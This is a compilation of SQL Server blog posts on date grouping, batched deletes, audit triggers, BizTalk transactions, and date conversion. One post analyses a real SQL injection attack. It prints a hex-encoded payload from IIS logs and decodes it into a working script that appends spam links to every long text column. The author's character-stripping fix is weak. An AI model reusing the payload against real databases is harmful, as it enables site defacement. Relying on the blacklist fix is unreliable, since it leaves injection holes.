In Microsoft SQL Server, how can we group by date when the column we want to group by is a datetime?
For example, you want the number of rows created for each date, and you have a column in the database called Date_Added (or in my example below, TrcDateTime).

Code Sample 1:

select DATEADD(dd, 0, DATEDIFF(dd, 0, trcDateTime)) as Date, 
       count(*) as count 
from trace 
GROUP BY DATEADD(dd, 0, DATEDIFF(dd, 0, trcDateTime))

Output 1:

The above gives the correct counts, but a rather ugly Date, because it shows the time as 00:00:00.000. To remove that, we can convert the date to a string.

Code Sample 2:

select LEFT(CONVERT(VARCHAR, DATEADD(dd, 0, DATEDIFF(dd, 0, trcDateTime)), 120), 10)  as Date, 
       count(*) as count
from trace
GROUP BY DATEADD(dd, 0, DATEDIFF(dd, 0, trcDateTime))

Output 2:

This is how you can convert a DateTime to a String:

LEFT(CONVERT(VARCHAR, trcDateTime, 120), 10)

I took the entire expression from the first query, DATEADD(dd, 0, DATEDIFF(dd, 0, trcDateTime)),
and substituted it where trcDateTime appears in the expression above.
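As an aside, on SQL Server 2008 and later there is a simpler way to get the same grouping: cast the datetime to the date type, which drops the time portion entirely. A sketch against the same trace table:

```sql
-- CAST to date truncates the time portion, so both the grouping and
-- the display are clean, with no DATEADD/DATEDIFF trick needed.
SELECT CAST(trcDateTime AS date) AS [Date],
       COUNT(*) AS [count]
FROM trace
GROUP BY CAST(trcDateTime AS date)
ORDER BY [Date]
```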




I have a SQL trace table, and a requirement to delete, each night, all rows in the trace over x days old. This is typically called a purge program, or a mass delete. If you don’t limit how many rows you delete at once, you can knock the lights out of SQL Server.

Below is a modification to code I found on another blog; that blog does a good job of explaining why we need to break the deletes into smaller chunks.

I added the WAITFOR DELAY statement, which is optional. If you have other jobs running that might be impacted by your delete, you don’t want to block them. So you simply pause, give them a chance to get in and out, then continue with the deletes.

-- Technique to avoid causing SQL slowness when deleting a large number of rows
-- (such as millions of rows) at one time, without freeing locks

declare @DaysToKeep int = 5
declare @RowsDeleted int = 1  -- must set > 0 so the loop will be entered the first time through 
declare @TotalRowsDeleted int = 0 
declare @StartDateTime datetime = DATEADD(d, -@DaysToKeep, getdate())

WHILE @RowsDeleted > 0
BEGIN
    DELETE TOP (1000) FROM Trace WHERE trcDateTime <= @StartDateTime
    SET @RowsDeleted = @@ROWCOUNT
    PRINT @RowsDeleted
    SET @TotalRowsDeleted = @TotalRowsDeleted + @RowsDeleted
    WAITFOR DELAY '00:00:01';  -- Give SQL a little break
END
SELECT @StartDateTime as StartDateTimeOfDelete, 
       @TotalRowsDeleted as RowsDeleted, (select COUNT(*) from Trace) as RemainingRows, 
       MIN(trcDateTime) as Min, MAX(trcDateTime) as Max from Trace  

--select count(*) from trace where trcDateTime >= DATEADD(d, -15, getdate())
--declare @DaysToKeep int = 20
--select DATEADD(d, -@DaysToKeep, getdate())

Suppose you have a large list of items that you want to put into a SQL IN clause, like this:

where firstname in (

But the data you have is in Excel or a text file, and doesn’t have the quotes and commas around it.

You can quickly modify the data using the RegEx Replace All feature of NotePad++.

Data to change and the Replace Commands



Data to be changed; then do Ctrl-H or Search/Replace… from the top menu.


This is what it means.  The “Find What” is set to (.*).  That means: find all characters on each line, and capture them. The parentheses are the capture symbols; everything between them is captured.  The dot means any character, and the * means 0 or more of those characters.

The “Replace with” is set to ‘\1’,.  The backslash-one refers to the first capture in parentheses from the “Find what” box above.  The other symbols happen to be what I wanted to add: a single quote at the beginning, and a single quote plus a comma at the end.



Results – After the Replace


where firstname in (

The only issue is the last name in the list will also have a comma after it.  You will just have to change that manually (i.e., remove the comma after “Abe” above).
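If the names are already loaded into a SQL Server table (a hypothetical staging table here), SQL Server 2017+ can build the quoted list for you instead; QUOTENAME with a single-quote delimiter also doubles any embedded quotes, and there is no trailing comma to clean up:

```sql
-- names_staging is a hypothetical table holding one name per row.
-- QUOTENAME(firstname, '''') wraps each value in single quotes;
-- STRING_AGG joins them with ', ' separators.
SELECT STRING_AGG(QUOTENAME(firstname, ''''), ', ') AS InList
FROM names_staging
```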


From time to time, I need to transfer data from one database to another. RedGate Data Compare is my tool of choice, but not all clients have a license for it ($495 for SQL Data Compare, $1795 for the Developer Suite). I also like SQL Database Compare if I need to sync DDL (tables, indexes, constraints, stored procs, functions, etc…) from one system to another.

The other day, as a BizTalk developer, I had to copy a lookup table from one system to an existing database on another system.  So I couldn’t just backup/restore the file.  I tried some of the tools in SQL, which I must admit I don’t use often, and I was getting a connectivity issue; maybe due to firewalls or a DMZ between the systems (not 100% sure).

Years ago, I remember a nice C# WinForm program that allowed you to enter a SQL statement, then would generate SQL Insert Statements from it.  I was having trouble finding it, but found two other alternatives.

Solution #1 – All SQL – Generating SQL Statements in SQL Server – I like this one because it is written entirely in T-SQL.  The site provides a stored proc that you add to your database and execute with a table name. You turn off grid mode (i.e., put your output in text mode), and save or copy/paste the results minus the header.  This let me get done what I needed this week in about 10 minutes.  I just took the generated SQL statements, copied them to the other server, and ran them in SSMS.  To run it, you just run the stored proc and pass the table name:

exec InsertGenerator MyTableName

Out of the box, it doesn’t give you the ability to select a subset of rows with a where clause.
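For reference, the generated output is just ordinary INSERT statements; a hypothetical sample of the shape you get back (table and columns invented for illustration):

```sql
INSERT INTO MyTableName (Code, Description) VALUES ('A1', 'Alpha One')
INSERT INTO MyTableName (Code, Description) VALUES ('B2', 'Beta Two')
```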

Solution #2 – C# – Generating SQL Statements in C# – This one is a C# solution if you prefer that language.  It’s a console program, so no WinForm/GUI.  I didn’t actually try this one.  I’m still hoping to find the GUI version that I found a few years ago.  I think it was on CodeProject as well.

In my case, it was a code lookup table used by a BizTalk map.  I took the insert statements as well as the create table statement, and added them to the BizTalk project (in a “doc” or “prereqs” subfolder) so future developers on different environments would be able to load up the table quickly. You can include other files such as .sql or .txt in a BizTalk project, but of course they are not compiled.  That way, they are checked into your source code repository.

Below is an example of RedGate Data Compare.  You specify two databases, then it shows you the tables. You can select all tables or individually select the tables you want to compare.  It then compares the rows of those tables.  However, note that the table has to exist in both databases for it to compare the table and generate SQL Insert statements.  SQL Database Compare will help you sync up the tables.

RedGate SQL Data Compare

This is how I found a SQL Injection Hacker who was changing all the product titles in my custom shopping cart using a diabolical injection technique. First, I knew the problem was happening, because I saw HTML inserted into my product titles and product descriptions of my database and website. My application was written in “Classic ASP” and VBScript, before .NET came out; since I have hundreds of scripts, I never rewrote them for .NET.

Protecting my Data and Setting the Trap

First of all, I added a T-SQL trigger to disallow multiple-record updates, and write to a log table when the trigger fires.

ALTER TRIGGER [dbo].[myTable_multiUpdatePrevention]
ON [dbo].[myTable]
AFTER UPDATE
AS
BEGIN
    DECLARE @Count int
    DECLARE @MaxAllowedRowToChange int = 5
    SELECT @Count = COUNT(*) FROM Inserted

    IF @Count > @MaxAllowedRowToChange
    BEGIN
        -- Log the issue to the table called 'LogHacks'
        DECLARE @Message varchar(500)
        SET @Message = 'Trigger: Possible Hack: Multiple update attempt: Table=Product rowCount=' + CONVERT(varchar(10), @Count)
        INSERT INTO LogHacks (logmessage, logdatetime, logUserid) VALUES (@Message, GETDATE(), SYSTEM_USER)

        RAISERROR('Cannot update more than x rows of Product table without disabling trigger', 16, 1)
        ROLLBACK TRANSACTION  -- actually undo the mass update
    END
END
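When you do need a legitimate mass update, the trigger's error message hints at the workaround: disable the trigger, run the update, then re-enable it. A sketch (the column name is hypothetical):

```sql
DISABLE TRIGGER [dbo].[myTable_multiUpdatePrevention] ON [dbo].[myTable];

UPDATE [dbo].[myTable] SET SomeColumn = 'new value';  -- intentional bulk change

ENABLE TRIGGER [dbo].[myTable_multiUpdatePrevention] ON [dbo].[myTable];
```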


Install Auditing Software

I installed “Auto Audit” from Codeplex, see my prior blog on this great tool.

Look at IIS Log

Based on the above, I monitored the LogHacks table, and could now see when the attack was happening; I was also now protected and didn’t have to keep restoring my data. I was able to capture the userid, which narrowed it down to one of my classic ASP pages.

I then went to my IIS log, and looked at the pages retrieved or posted nearest that time. I found this:

2015-03-05 15:17:57 GET /MyDir/MyCatalog.asp brand=1'+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b275d292b27273c2f7469746c653e3c7374796c653e2e617271687b706f736974696f6e3a6162736f6c7574653b636c69703a726563742834303070782c6175746f2c6175746f2c3432347078293b7d3c2f7374796c653e3c64697620636c6173733d617271683e3c6120687265663d687474703a2f2f67656e657269636369616c6973617375692e636f6d203e6368656170206369616c69732067656e65726963206f6e6c696e653c2f613e3c2f6469763e2727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(@s)-- 80 - 
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1)'+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b275d292b27273c2f7469746c653e3c7374796c653e2e617271687b706f736974696f6e3a6162736f6c7574653b636c69703a726563742834303070782c6175746f2c6175746f2c3432347078293b7d3c2f7374796c653e3c64697620636c6173733d617271683e3c6120687265663d687474703a2f2f67656e657269636369616c6973617375692e636f6d203e6368656170206369616c69732067656e65726963206f6e6c696e653c2f613e3c2f6469763e2727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(@s)-- 200 0 64 1781

At first, I was being narrow-minded, and thought injection was only happening in web page forms.
I hadn’t thought about query strings on the URL itself!

Just to find out how this amazingly clever piece of code works, I did the following:

Captured SQL Generated from my ASP Program

Below, you can see that they took my “like” clause and hijacked it, by closing it with a single quote, then adding their own statements.

SQL=Select * from myView where abc_title like '%language series%'  and abc_title like '%1' declare @s varchar(8000) set @s=cast(0x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b275d292b27273c2f7469746c653e3c7374796c653e2e617271687b706f736974696f6e3a6162736f6c7574653b636c69703a726563742834303070782c6175746f2c6175746f2c3432347078293b7d3c2f7374796c653e3c64697620636c6173733d617271683e3c6120687265663d687474703a2f2f67656e657269636369616c6973617375692e636f6d203e6368656170206369616c69732067656e65726963206f6e6c696e653c2f613e3c2f6469763e2727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72 as varchar(8000)) exec(@s)%' and prod_yn_visible = 'Y' order by prod_priority_sort desc, prod_code

Unscramble the Hex Code

To interpret the above mess, I wrote this little T-SQL script (note: I copied the entire hex string, but below I put “…” so as not to repeat it again here):

declare @showvar varchar(8000)
set @showvar = cast(0x73...36f72 as varchar(8000))
print @showvar

Looking at the Hacker’s Actual Code

When I ran the above code, the actual SQL is shown (line breaks added to make it readable):

set ansi_warnings off
DECLARE @T VARCHAR(255), @C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
  select c.TABLE_NAME, c.COLUMN_NAME
  from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t
  where c.DATA_TYPE in ('nvarchar','varchar','ntext','text')
  and c.CHARACTER_MAXIMUM_LENGTH>80 and t.table_name=c.table_name
  and t.table_type='BASE TABLE'
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
  EXEC('UPDATE ['+@T+'] SET ['+@C+']=CONVERT(VARCHAR(8000),['+@C+'])+''</title><style>.arqh{position:absolute;clip:rect(400px,auto,auto,424px);}</style><div class=arqh><a href=http://genericcialisasui.com >cheap cialis generic online</a></div>'' ')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
I must admit this is some clever code, and it illustrates what hackers will do to sell generic drugs for “you know what”. When I went to their site, my malware plug-in told me it wasn’t safe, so I didn’t actually load their pages.

The code is basically looking for all long text fields, anything over 80 characters in length. It does that by querying INFORMATION_SCHEMA.columns and INFORMATION_SCHEMA.tables, peeking at all my tables and columns. The goal of the attack is apparently to just append their HTML code and let your site keep working, so that for many days they get the SEO benefit of the extra link-backs, until you discover the issue. However, in some cases the HTML did not close properly, and made a mess of some of my web pages.

Finding my injection bug

I found that I was stringing together a complex where clause depending on various factors. So the moral of the story is: never take anything directly from the URL! Request(“language”) pulls a language variable from the URL. They basically set language to close off the LIKE wildcard, then put their own code after that…

optionalSelection = " and prod_title like '%" & Request("language") & "%'"

Fixing my injection bug

optionalSelection = " and prod_title like '%" & fixSqlInsertion(Request("language")) & "%'"

function fixSqlInsertion(stringin)
    temp1 = replace(stringin, "'", "")
    temp1 = replace(temp1, ";", "")
    temp1 = replace(temp1, ",", "")
    temp1 = replace(temp1, ">", "")
    temp1 = replace(temp1, "<", "")
    temp1 = replace(temp1, "=", "")
    temp1 = replace(temp1, "@", "")
    temp1 = replace(lcase(temp1), "delete", "nodelete")
    temp1 = replace(lcase(temp1), "drop", "nodrop")
    fixSqlInsertion = temp1
end function

The above is not super-elegant; it results in a “500 Server Error” to the caller, but I don’t really care what the hacker sees. If he sees the 500, maybe he will quit visiting my site. This was the fastest fix, not the most effective. The better technique would probably be to create a stored procedure and pass parameters to it. Another technique would be to limit the URL to a maximum length, to avoid long chunks of code like the one above.

The code above just removes the characters that a SQL injection needs to do damage. To be valid T-SQL, an attack needs the @ sign for variables, quote marks, and equal signs. A DELETE or a DROP doesn’t require all that punctuation, so I prohibit those words, substituting a fake word that will cause the SQL to fail.

There are two other ideas I could use to improve my code further:

1) Parameterized queries
2) Just make sure a SQL select statement doesn’t contain the words “Update”, “Delete”, “Drop”, “Alter”, etc… A select should just be a select.
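On the T-SQL side, idea #1 looks like the sketch below: the user's value travels as a typed parameter to sp_executesql, so a quote inside it can never terminate the LIKE string (the variable names are mine, not from the original page):

```sql
-- Attacker-style input, harmless here because it is only ever a value:
DECLARE @language nvarchar(200) = N'1'' declare @s varchar(8000)--'

DECLARE @sql nvarchar(max) =
    N'SELECT * FROM myView WHERE abc_title LIKE ''%'' + @lang + ''%'''

-- @lang is bound as data, not spliced into the SQL text.
EXEC sp_executesql @sql, N'@lang nvarchar(200)', @lang = @language
```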

Here are some references to other resources on fixing SQL Injection hacks.  Some are for PHP, but PHP is conceptually very similar to the VBScript and Classic ASP I was using.  You might want to do further searches for your particular programming language.
  • Good intro to SQL Injection on Wikipedia



T-SQL Error

IDENTITY_INSERT is already ON for table schema.SomeTableName. Cannot perform SET operation for table Table Name.


At any time, only one table in a session can have the IDENTITY_INSERT property set to ON.  So when you try to set it ON for another table, without turning it off for the first table, this error is generated.

Enter this command for the first table mentioned in the above error.

SET IDENTITY_INSERT [yourSchema].[yourTable] OFF


This happened to me when moving data from one SQL Server to another using a RedGate synchronization script.  The script was too large to run all at once, so I had to cut it into smaller pieces.  That utility turns IDENTITY_INSERT on before each table’s set of inserts, then turns it back off at the end of those inserts; cutting the script between those statements is what triggered the error.
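The pattern those generated scripts follow looks roughly like this (table and column names hypothetical), which shows why a cut in the wrong place can leave IDENTITY_INSERT stranded ON:

```sql
SET IDENTITY_INSERT [dbo].[Employee] ON;
INSERT INTO [dbo].[Employee] (EmployeeId, Name) VALUES (42, 'Some Name');
-- If the script is split before the next line, the next table's ON fails:
SET IDENTITY_INSERT [dbo].[Employee] OFF;
```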



A few years ago I discovered a great utility called “Auto Audit” on CodePlex by Paul Nielson and John Sigouin. The best thing is that it creates triggers that audit inserts, updates, and deletes on any desired table. It creates a global audit table, and creates triggers specific to each of your tables.  It can optionally add these columns to each table: CreatedDate, CreatedBy, ModifiedDate, ModifiedBy, and RowVersion (an incrementing INT).  It includes views to see your audits, and it adds eight of its own tables to your database (all nicely put in the ‘Audit’ schema).  It also logs who is running DDL commands, so you know, for example, which DBA or which developer added some column to some schema.

It’s like a mini-framework to make sure all your triggers and auditing are done in a consistent manner, and it writes all the tedious trigger code for you. This of course allows you to see who changed what and when. The other benefit is that it standardizes the process, and builds the trigger for you. I’ve been in other companies where we had similar functionality, but it was all hand-coded, and rather tedious to create and update the triggers.

When you download it, what you get is just one big .sql file, 6422 lines long.  You run that script in each database in which you want to use Auto Audit.


I had a database called NealDemo with one table dbo.Employee (in the red box below).  Running the Auto Audit script added 8 of its own tables, but as of yet, it does not touch the Employee table.  We have to do the next step for that to happen.


Running the above will also create some stored procedures, views, and most importantly the SchemaAuditDDLTrigger DDL trigger.  This will allow you to see who, for instance, modified a table structure, because that will get audited too.

 Turning On Audit for a Table


So to turn on auditing for one single table, you do this (overriding the schema or other parms as desired):

exec [Audit].[pAutoAudit] @TableName='Employee', @BaseTableDDL=1

Note: If you don’t specify @BaseTableDDL=1, the 5 columns won’t get added to the table.  Below is an example of my employee table, and it’s fairly obvious which 5 columns were added.

If you are ready to turn it on everywhere, on all tables, instead use pAutoAuditAll.
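A sketch of that call, assuming pAutoAuditAll accepts the same @BaseTableDDL parameter as the single-table proc (I have not verified its full parameter list):

```sql
EXEC [Audit].[pAutoAuditAll] @BaseTableDDL = 1
```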


It created three triggers on my Employee table.  The update trigger alone is 305 lines of code, and the other two are about 150 lines each.


Viewing the Audits

I ran the following update:


Rather than creating one audit table for each table, Auto Audit uses one consolidated audit table:



However, it does create a view for each table.  In addition, it creates a view called Employee_Deleted to show any rows deleted from my Employee table.



Table Function

There’s also a table function that can be used on a single key.  Below I show the difference between vAuditAll and using the function against that same key:



Auditing DDL Changes

Now look what happens when you “Alter” a table.  There is a Database Trigger called “SchemaAuditDDLTrigger”. It catches the changes and logs them, as well as rebuilds the triggers on the Employee table.


To view who changed the table or anything in the schema using DDL, check the Audit.SchemaAudit table:




I’m so impressed with this utility.  If you have no auditing at all on your database, you can turn this on in just a matter of minutes.  Note however, that it could impact your performance, so be sure to benchmark if you are pushing the boundaries on performance already.



One day, I hope to be able to fully understand and explain the “Ambient Transaction” true/false option in BizTalk WCF-SQL and WCF-Custom send and receive ports.  Until then, I’m going to collect the most relevant info and blogs here:

The official Microsoft BizTalk parameter definition (for the WCF Send or Receive Port):

Specifies whether the SQL adapter performs the operations using the transactional context provided by the caller. Default is true, which means that the adapter always performs the operations in a transactional context. If there are other resources participating in the transaction, and SQL Server also joins the transaction, the transaction gets elevated to an MSDTC transaction.

However, there can be scenarios where you do not want the adapter to perform operations in a transactional context. For example:

  • While performing a simple Select operation on a SQL Server database
  • While specifying a polling statement that performs a Select operation, and does not involve any changes to the table either through a Delete statement or by invoking a stored procedure.

Both these operations do not make any updates to the database table and, hence, elevating these operations to use an MSDTC transaction can be a performance overhead. In such scenarios, you can set the binding property to false so that the SQL adapter does not perform the operations in a transactional context.

Not performing operations in a transactional context is advisable only for operations that do not make changes to the database. For operations that update data in the database, we recommend setting the binding property to true; otherwise you might either experience message loss or duplicate messages, depending on whether you are performing inbound or outbound operations.

Richard Seroter (who usually has great blogs on BizTalk topics) refers to the “Ambient Transaction” feature as being part of System.Transactions in .NET Framework 2.0 and later.  It seems like understanding ambient transactions from native C# first would be key to understanding how they work in BizTalk.

The above link provides the following information, but as for me now, it does not pass the “so what” and the “WIIFM” (What’s In It for Me) test.

System.Transactions defines a concept called an ambient transaction. The ambient transaction is the transaction that is present in the thread that the current application code is executing within. To obtain a reference to the ambient transaction call the static Current property of Transaction:

Transaction ambientTransaction = Transaction.Current;

If there is no ambient transaction, Current will return null.

The ambient transaction object is stored in the thread local storage (TLS). As a result, when the thread winds its way across multiple objects and methods, all objects and methods can access their ambient transaction.

Later it says:

The value of TransactionScopeOption lets you control whether the scope takes part in a transaction, and if so, whether it will join the ambient transaction or become the root scope of a new transaction.


A TransactionScope object has three options:

  • Join the ambient transaction.
  • Be a new scope root, that is, start a new transaction and have that transaction be the new ambient transaction inside its own scope.
  • Do not take part in a transaction at all.


This forum post tries to answer the question: “What exactly is an ambient transaction?”



There are 2 main kinds of transactions; connection transactions and ambient transactions. A connection transaction (such as SqlTransaction) is tied directly to the db connection (such as SqlConnection), which means that you have to keep passing the connection around – OK in some cases, but doesn’t allow “create/use/release” usage, and doesn’t allow cross-db work.

The alternative is an ambient transaction; new in .NET 2.0, the TransactionScope object (System.Transactions.dll) allows use over a range of operations (suitable providers will automatically enlist in the ambient transaction). This makes it easy to retro-fit into existing (non-transactional) code, and to talk to multiple providers (although DTC will get involved if you talk to more than one).

Note here that the two methods can handle their own connections (open/use/close/dispose), yet they will silently become part of the ambient transaction without us having to pass anything in.

If your code errors, Dispose() will be called without Complete(), so it will be rolled back. The expected nesting etc is supported, although you can’t roll-back an inner transaction yet complete the outer transaction: if anybody is unhappy, the transaction is aborted.

The other advantage of TransactionScope is that it isn’t tied just to databases; any transaction-aware provider can use it. WCF, for example. Or there are even some TransactionScope-compatible object models around (i.e. .NET classes with rollback capability – perhaps easier than a memento, although I’ve never used this approach myself).


Blog on the topic:  Transaction.Current and Ambient Transactions by Florin Lazar:

Key phrase from above blog: “Transaction.Current can detect that the transaction was created inside a COM+ context and provide it to anyone asking for the ambient transaction.”

StackOverflow: Difference Between Transaction and TransactionScope

Key phrase: The ambient transaction is the transaction within which your code executes.

Transaction Scope Class (C# examples):

And a final link – a comparison of transaction handling in .NET 1.0 and 2.0 (rather old, but it may help give the background of when the “Ambient Transaction” was birthed):

CodeProject Sample Demo/Code:

A transaction scope automatically identifies a code block that needs to support a transaction, without explicitly mentioning anything transaction-related. An ambient transaction is not tied just to a database; any transaction-aware provider can be used. TransactionScope implements an ambient transaction. If you look at code using TransactionScope, you will not find anything transaction-related passed to any method or set on any property; a code block is automatically attached to the transaction if it is inside a TransactionScope. A WCF transaction is another example of a transaction-aware provider, and anyone can write a transaction-aware provider like the WCF implementation.



WCF-SQL and DTC Ambient Transactions in a cross domain scenario

The ambient transaction option ensures that the BizTalk adapter flows a transaction through to SQL Server and thus the SQL transaction will only commit when the message received by BizTalk is successfully written to the BizTalk message box database.  This is of course crucial in a guaranteed delivery based solution where you can’t afford to lose any messages.

I found that all worked well when ambient transactions were turned off, however when turned on it looked like the receive location just hangs, holding a lock on SQL resources (I tried to do a select on the table in question using SQL Server Management Studio and it couldn’t return any values due to locks being in place) which won’t be removed until the host instance is reset.

The above blog talks about using DTCPing and DTCTester to identify DTC issues, and fixing them by relaxing the security options in the DTC configuration.

Conclusions (or lack thereof):

So for now, I suggest studying that second web page to get an idea of what the topic is really about.  If I had time, I would write some C# programs to test outside of BizTalk.


-- MSSQL Server string to date conversion – datetime string format sql server
-- MSSQL string to datetime conversion – convert char to date sql server

SELECT convert(datetime, 'Oct 23 2012 11:01AM', 100) -- mon dd yyyy hh:mmAM (or PM)

SELECT convert(datetime, 'Oct 23 2012 11:01AM') -- 2012-10-23 11:01:00.000

-- Without century (yy) string date conversion – convert string to datetime

SELECT convert(datetime, 'Oct 23 12 11:01AM', 0) -- mon dd yy hh:mmAM (or PM)

SELECT convert(datetime, 'Oct 23 12 11:01AM') -- 2012-10-23 11:01:00.000

-- Convert string to datetime sql – convert string to date sql – sql dates format

-- T-SQL convert string to datetime – SQL Server convert string to date

SELECT convert(datetime, '10/23/2016', 101) -- mm/dd/yyyy

SELECT convert(datetime, '2016.10.23', 102) -- yyyy.mm.dd

SELECT convert(datetime, '23/10/2016', 103) -- dd/mm/yyyy

SELECT convert(datetime, '23.10.2016', 104) -- dd.mm.yyyy

SELECT convert(datetime, '23-10-2016', 105) -- dd-mm-yyyy

-- mon types are nondeterministic conversions, dependent on language setting

SELECT convert(datetime, '23 OCT 2016', 106) -- dd mon yyyy

SELECT convert(datetime, 'Oct 23, 2016', 107) -- mon dd, yyyy

-- 2016-10-23 00:00:00.000

SELECT convert(datetime, '20:10:44', 108) -- hh:mm:ss

-- 1900-01-01 20:10:44.000

-- mon dd yyyy hh:mm:ss:mmmAM (or PM) – sql time format

SELECT convert(datetime, 'Oct 23 2016 11:02:44:013AM', 109)

-- 2016-10-23 11:02:44.013

SELECT convert(datetime, '10-23-2016', 110) -- mm-dd-yyyy

SELECT convert(datetime, '2016/10/23', 111) -- yyyy/mm/dd

SELECT convert(datetime, '20161023', 112) -- yyyymmdd

-- 2016-10-23 00:00:00.000

SELECT convert(datetime, '23 Oct 2016 11:02:07:577', 113) -- dd mon yyyy hh:mm:ss:mmm

-- 2016-10-23 11:02:07.577

SELECT convert(datetime, '20:10:25:300', 114) -- hh:mm:ss:mmm(24h)

-- 1900-01-01 20:10:25.300

SELECT convert(datetime, '2016-10-23 20:44:11', 120) -- yyyy-mm-dd hh:mm:ss(24h)

-- 2016-10-23 20:44:11.000

SELECT convert(datetime, '2016-10-23 20:44:11.500', 121) -- yyyy-mm-dd hh:mm:ss.mmm

-- 2016-10-23 20:44:11.500

SELECT convert(datetime, '2008-10-23T18:52:47.513', 126) -- yyyy-mm-ddThh:mm:ss.mmm

-- 2008-10-23 18:52:47.513

-- Convert DDMMYYYY format to datetime

SELECT convert(datetime, STUFF(STUFF('31012016',3,0,'-'),6,0,'-'), 105)

-- 2016-01-31 00:00:00.000

-- SQL string to datetime conversion without century – some exceptions

SELECT convert(datetime, '10/23/16', 1) -- mm/dd/yy

SELECT convert(datetime, '16.10.23', 2) -- yy.mm.dd

SELECT convert(datetime, '23/10/16', 3) -- dd/mm/yy

SELECT convert(datetime, '23.10.16', 4) -- dd.mm.yy

SELECT convert(datetime, '23-10-16', 5) -- dd-mm-yy

SELECT convert(datetime, '23 OCT 16', 6) -- dd mon yy

SELECT convert(datetime, 'Oct 23, 16', 7) -- mon dd, yy

SELECT convert(datetime, '20:10:44', 8) -- hh:mm:ss

SELECT convert(datetime, 'Oct 23 16 11:02:44:013AM', 9)

SELECT convert(datetime, '10-23-16', 10) -- mm-dd-yy

SELECT convert(datetime, '16/10/23', 11) -- yy/mm/dd

SELECT convert(datetime, '161023', 12) -- yymmdd

SELECT convert(datetime, '23 Oct 16 11:02:07:577', 13) -- dd mon yy hh:mm:ss:mmm

SELECT convert(datetime, '20:10:25:300', 14) -- hh:mm:ss:mmm(24h)

SELECT convert(datetime, '2016-10-23 20:44:11', 20) -- yyyy-mm-dd hh:mm:ss(24h)

SELECT convert(datetime, '2016-10-23 20:44:11.500', 21) -- yyyy-mm-dd hh:mm:ss.mmm

We have one table with about 120 columns in it. I was just curious what the average row size was, and found this slick solution:

Use DBCC to find the “Average Size of a Row”


dbcc showcontig ('your_table_name') with tableresults

My table name is 'Transaction', so substitute your table name there.

dbcc showcontig ('Transaction') with tableresults

average row size

Useful columns in the result are: AverageRecordSize, MinimumRecordSize, MaximumRecordSize
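Note that DBCC SHOWCONTIG is deprecated in newer SQL Server versions; the replacement DMV reports the same record-size statistics. A sketch for the same 'Transaction' table:

```sql
-- avg/min/max record size columns are populated in 'SAMPLED' or 'DETAILED' mode
SELECT avg_record_size_in_bytes,
       min_record_size_in_bytes,
       max_record_size_in_bytes
FROM sys.dm_db_index_physical_stats(DB_ID(), OBJECT_ID('Transaction'), NULL, NULL, 'DETAILED')
```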